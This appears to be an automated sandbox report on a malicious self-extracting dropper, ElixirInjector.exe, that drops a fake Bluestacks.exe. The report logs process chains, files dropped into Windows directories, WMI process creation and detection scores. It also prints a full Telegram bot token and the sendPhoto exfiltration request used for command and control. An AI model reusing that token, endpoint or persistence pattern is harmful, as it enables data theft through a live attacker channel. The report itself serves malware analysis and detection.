Source: ElixirInjector.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Directory created: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Directory created: C:\Program Files\7-Zip\ad448380f74670			Jump to behavior

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49852 version: TLS 1.2

Source: ElixirInjector.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ElixirInjector.exe

Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00F1A69B
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00F2C220
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F3B348 FindFirstFileExA,	0_2_00F3B348

Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\Temp\WinRAR\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\Local\Temp\WinRAR\data\	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49852 -> 149.154.167.220:443

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /bot7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="2fc83503-aa7d-4956-907f-539a12425ce1"Host: api.telegram.orgContent-Length: 86494Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipinfo.io

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49847 -> 34.117.59.81:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="2fc83503-aa7d-4956-907f-539a12425ce1"Host: api.telegram.orgContent-Length: 86494Expect: 100-continueConnection: Keep-Alive

Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Bluestacks.exe, 00000005.00000002.2476855882.000000000096B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002E47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.2711170889.000001AE88EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E400807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.00000222296CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB084A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B23128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538287000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C0936A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF2D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F5F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.00000240066A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Bluestacks.exe, 00000005.00000002.2525083932.000000000297E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2711170889.000001AE88B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E4005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.0000022229321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB08281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B22F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C093481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F3E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.0000024006481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.2711170889.000001AE88EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E400807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.00000222296CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB084A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B23128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538287000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C0936A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF2D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F5F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.00000240066A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001E.00000002.2711170889.000001AE88B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E4005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.0000022229321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB08281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B22F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C093481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F3E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.0000024006481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Bluestacks.exe, 00000005.00000002.2518199953.0000000000BC2000.00000002.00000001.01000000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.000000000297E000.00000004.00000800.00020000.00000000.sdmp, BlUGSVrR.log.5.dr	String found in binary or memory: https://api.telegram.org/bot
Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI/sendPhotoX
Source: powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.0000000002E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2518199953.0000000000BC2000.00000002.00000001.01000000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.000000000297E000.00000004.00000800.00020000.00000000.sdmp, BlUGSVrR.log.5.dr	String found in binary or memory: https://ipinfo.io/country
Source: Bluestacks.exe, 00000005.00000002.2525083932.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2518199953.0000000000BC2000.00000002.00000001.01000000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.000000000297E000.00000004.00000800.00020000.00000000.sdmp, BlUGSVrR.log.5.dr	String found in binary or memory: https://ipinfo.io/ip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49852 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F16FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00F16FAA

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\BitLockerDiscoveryVolumeContents\ad448380f74670	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\Microsoft.NET\ad448380f74670	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\ShellComponents\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	File created: C:\Windows\ShellComponents\ebf1f9fa8afd6d	Jump to behavior

Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1848E	0_2_00F1848E
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F26CDC	0_2_00F26CDC
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F140FE	0_2_00F140FE
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F200B7	0_2_00F200B7
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F24088	0_2_00F24088
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F351C9	0_2_00F351C9
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F27153	0_2_00F27153
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F132F7	0_2_00F132F7
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F262CA	0_2_00F262CA
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F243BF	0_2_00F243BF
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1F461	0_2_00F1F461
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F3D440	0_2_00F3D440
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1C426	0_2_00F1C426
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F277EF	0_2_00F277EF
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F3D8EE	0_2_00F3D8EE
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1286B	0_2_00F1286B
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F419F4	0_2_00F419F4
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1E9B7	0_2_00F1E9B7
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F23E0B	0_2_00F23E0B
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F1EFE2	0_2_00F1EFE2
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F34F9A	0_2_00F34F9A
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Code function: 5_2_00007FFD34670D48	5_2_00007FFD34670D48
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Code function: 5_2_00007FFD34670E43	5_2_00007FFD34670E43
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Code function: 5_2_00007FFD346713E8	5_2_00007FFD346713E8
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Code function: 5_2_00007FFD34A65FD7	5_2_00007FFD34A65FD7
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Code function: 75_2_00007FFD34680D48	75_2_00007FFD34680D48
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Code function: 75_2_00007FFD34680E43	75_2_00007FFD34680E43
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Code function: 75_2_00007FFD346813E8	75_2_00007FFD346813E8

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BlUGSVrR.log B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6

Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: String function: 00F2EB78 appears 39 times
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: String function: 00F2EC50 appears 56 times
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: String function: 00F2F5F0 appears 31 times

Source: TxvLlrMg.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DvqGSnXS.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: rCAqismj.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uAazTYNi.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: EbKwZRsK.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wxCHpYcd.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mPirFwXv.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: VHSMlJrg.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: ElixirInjector.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Bluestacks.exe, 00000005.00000000.2216100697.0000000000162000.00000002.00000001.01000000.0000000A.sdmp, fontdrvhost.exe, 00000043.00000002.3168678636.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, fvXBwqYdGYPkplbuTcoXecCdP.exe, 0000004B.00000002.2818142355.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, fvXBwqYdGYPkplbuTcoXecCdP.exe, 0000004B.00000002.3193616252.0000000012F72000.00000004.00000800.00020000.00000000.sdmp, fvXBwqYdGYPkplbuTcoXecCdP.exe0.5.dr, Bluestacks.exe.0.dr

Binary or memory string: &.vBPs

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@84/100@2/2

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F16C74 GetLastError,FormatMessageW,

0_2_00F16C74

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F2A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00F2A6C2

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

File created: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

File created: C:\Users\user\Desktop\uAazTYNi.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-B8rfKRhj2yUsgHgmOHtf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03

Source: C:\Users\user\Desktop\ElixirInjector.exe

File created: C:\Users\user\AppData\Local\Temp\WinRAR

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat" "

Source: C:\Users\user\Desktop\ElixirInjector.exe	Command line argument: sfxname	0_2_00F2DF1E
Source: C:\Users\user\Desktop\ElixirInjector.exe	Command line argument: sfxstime	0_2_00F2DF1E
Source: C:\Users\user\Desktop\ElixirInjector.exe	Command line argument: STARTDLG	0_2_00F2DF1E

Source: ElixirInjector.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\ElixirInjector.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\ElixirInjector.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ElixirInjector.exe	ReversingLabs: Detection: 60%
Source: ElixirInjector.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\ElixirInjector.exe

File read: C:\Users\user\Desktop\ElixirInjector.exe

Jump to behavior

